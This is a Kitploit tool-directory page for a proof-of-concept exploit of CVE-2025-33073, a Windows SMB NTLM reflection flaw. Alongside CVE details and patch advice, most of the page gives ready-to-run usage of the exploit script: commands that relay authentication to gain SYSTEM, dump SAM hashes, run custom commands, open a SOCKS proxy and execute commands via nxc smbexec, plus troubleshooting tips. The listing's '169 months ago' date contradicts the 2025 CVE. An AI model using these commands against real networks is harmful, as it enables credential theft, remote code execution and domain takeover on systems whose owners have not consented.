Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Blackash-CVE-2025-33073 — CVE-2025-33073 | Kitploit
Tools/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
Vulnerability AnalysisExploitationLateral MovementPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

View Repository
169 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

✨ CVE-2025-33073: Windows SMB RCE Vulnerability 🚨

🔥 High-Severity Authenticated Remote Code Execution 🔥 Improper Access Control in Windows SMB Client (CWE-284)


🛡️ Key Details at a Glance

Download Tool
AspectDetails
CVSS v3.1 Score8.8 (High) 🔥
Affected SystemsWindows 10, 11, Server 2012–2025 (all editions) 💻
Disclosure DateJune 10, 2025 📅 (Patched in June 2025 Patch Tuesday)
ExploitationActively exploited in the wild 😱
Added to CISA KEV on Oct 21, 2025
Attack VectorNetwork (Authenticated) 🌐
ImpactSYSTEM-level code execution 👑
Lateral movement via Kerberos relay
BypassNTLM reflection mitigations ⚡

🛠️ Immediate Mitigations

  1. Patch Now! 🔧
    → Apply Microsoft updates (e.g., KB5060998)
    → Microsoft Update Guide 🔗

  2. Enable SMB Signing ✍️
    → Enforce on all clients & servers
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. Restrict NTLM 🚫
    → Block NTLM where possible
    → Monitor for relay attempts with EDR tools

  4. Automated Fix? 🤖
    → Use Vicarius vRx or custom scripts for mass remediation


⚠️ Why It Matters

  • Bypasses traditional NTLM protections 🛑
  • Works even with SMB signing not enforced
  • Enables full domain takeover in misconfigured AD environments 🏰

Status as of November 15, 2025:
✅ Patched
❌ Still exploited in unpatched systems
🔔 CISA Deadline: Nov 10, 2025 ⏰


⚠️ Example usage

GUI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

Custom command Instead of running secretsdump a custom command can be executed.

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS For more stealthy execution of commands after valid connection as SYSTEM has been made. --target and --target-ip should be equal here.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

Also a custom command can be ran through proxychains instead of dumping SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

Manual exploit without DNS requirement

If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record.

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

Troubleshooting:

  • I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali. If Kali is not using the DNS server or you get a '/ FAILED' message from impacket-ntlmrelayx try adding the host to your /etc/hosts file. This should result in the attack working.

  • If using IP the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of failure. It's until now not perfectly clear why this happens. I think it has something to do with networking.

  • Try another coerce method using -M or --method.


Wireshark:

Local NTLM authentication takes place

455252866-0a3fe643-2d52-427a-91f2-991770732f62

Local NTLM authentication does not take place resulting in a FAILED attempt

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

Good to know:

  • xterm allows copying and pasting with the middle mouse button.
  • DNS-record should also be known to the client, this can take more time in some occasions. With more time I mean give it a couple of minutes.
  • This is just a PoC which means AV/EDR bypasses have not been tried to bypass. Use at own risk.

Don’t wait — patch today! 🛑
Your network’s security depends on it. 💪